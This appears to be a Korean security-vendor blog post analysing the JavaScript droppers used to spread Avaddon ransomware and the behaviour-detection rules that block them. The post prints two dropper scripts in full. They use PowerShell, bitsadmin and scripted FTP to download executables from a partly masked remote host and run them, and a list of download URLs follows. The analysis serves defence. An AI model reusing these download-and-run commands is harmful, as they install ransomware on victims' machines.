본문 바로가기
악성코드 정보

Avaddon 랜섬웨어 유포 스크립트 및 V3 행위탐지

by AhnLab ASEC 분석팀 2020. 6. 26.

지난 6월 26일 "RigEK 이용한 Avaddon 랜섬웨어 국내 유포 중(*.avdn 확장자)"라는 제목으로 블로그를 통해 분석 정보를 공유하였다. ASEC 분석팀은 금일 이 Avaddon 랜섬웨어 유포에 사용된 자바 스크립트 파일을 확인하여 이에 대한 내용과 해당 유포에 사용된 방법이 V3 행위탐지에 의해 사전 차단되는 내용을 소개하고자 한다.

 

 

RigEK 이용한 Avaddon 랜섬웨어 국내 유포 중(*.avdn 확장자)

6월 초에 아래의 해외 사이트를 통해 Avaddon 이름의 신종 랜섬웨어에 대한 기사가 소개되었다. 6월 8일부터 국내에서 RigEK(Rig Exploit Kit)를 이용한 악성코드 유포 수가 급증한 것을 확인하였고, 해당

asec.ahnlab.com

아래의 코드가 실제 해당 랜섬웨어 유포에 사용된 코드이다. Powershell, bitsadmin 및 FTP를 이용한 외부파일 다운로드 기능을 사용하였다. 

 

var zifidz = 99575;
var igigh = 293994;
var goaehg = 203004;
var ieahgheai = 29499;
var jsRun=new ActiveXObject('WSCRIPT.Shell');
var daogdeg = 200054;
var shougeahf = 40050;
jsRun.Run("cmd.exe cmd.exe /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://xxx.8.117.xx/wtava.exe','%temp%\\7865336.exe');Start-Process '%temp%\\7865336.exe'",false);
var oehgrhg = 394995;
var gouheaugh = 3949050;
var rohgrhg = 359395;
var sgirgh = 495032;
jsRun.Run("cmd.exe /c bitsadmin /transfer twetaeihwuwe /download /priority high http://xxx.8.117.xx/wtava.exe %temp%\\75365357.exe&start %temp%\\75365357.exe", false);
var gaheiifaeh = 200305;
var osrghuorshg = 294995;
var ouaeguo = 3294950;

[유포 자바스트립트 파일1]

 

var jsRun=new ActiveXObject('WSCRIPT.Shell');
jsRun.Run("cmd.exe /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://xxx.8.117.xx/jpr.exe','%temp%\26474224.exe');Start-Process '%temp%\26474224.exe'",false);
jsRun.Run("cmd.exe /c bitsadmin /transfer downit /download /priority high http://xxx.8.117.xx/jpr.exe %temp%\46247242.exe&start %temp%\46247242.exe", false);
jsRun.Run("cmd.exe /c echo open xxx.8.117.xx >> ftp &echo user srijan passpass >> ftp &echo binary >> ftp &echo get jpr.exe >> ftp &echo bye >> ftp &ftp -n -v -s:ftp &del ftp&start jpr.exe", false);

[유포 자바스크립트 파일2]

 

 

 

각각의 유포 스크립트에서 파일 다운로드 시, 파일마다 같은 다운로드 주소를 사용하지만 다운로드 된 파일을 저장할 때에는 각각 다른 이름으로 저장된다. Powershell과 Bitsadmin를 통해 다운로드 된 파일은 7, 8자리의 숫자로 구성된 파일명으로 %temp%경로에 저장되며, FTP를 이용한 경우에는 다운로드 시 사용된 명과 같은 이름으로 저장된다.

 

  • 현재까지 확인 된 파일 다운로드 주소

    http://xxx.8.117.xx/wtava.exe

    http://xxx.8.117.xx/sava.exe

    http://xxx.8.117.xx/tspm.exe

 

V3 제품에서는 이러한 유포 방식에 대해 다운로드 및 자동실행 등록 시점에 행위탐지 기능으로 사전차단을 수행하고 있으며 각각의 차단 룰의 정보는 아래와 같다.

 

[1] Powershell.exe 이용한 파일 다운로드

  • Malware/MDP.Behavior.M2514 진단명으로 행위탐지

 

[2] Bitsadmin.exe 이용한 파일 다운로드

  • Malware/MDP.Download.M3120 진단명으로 행위탐지

 

[3] 다운로드 후, 자동실행 등록행위

  • Malware/MDP.AutoRun.M224 진단명으로 행위탐지

 

댓글0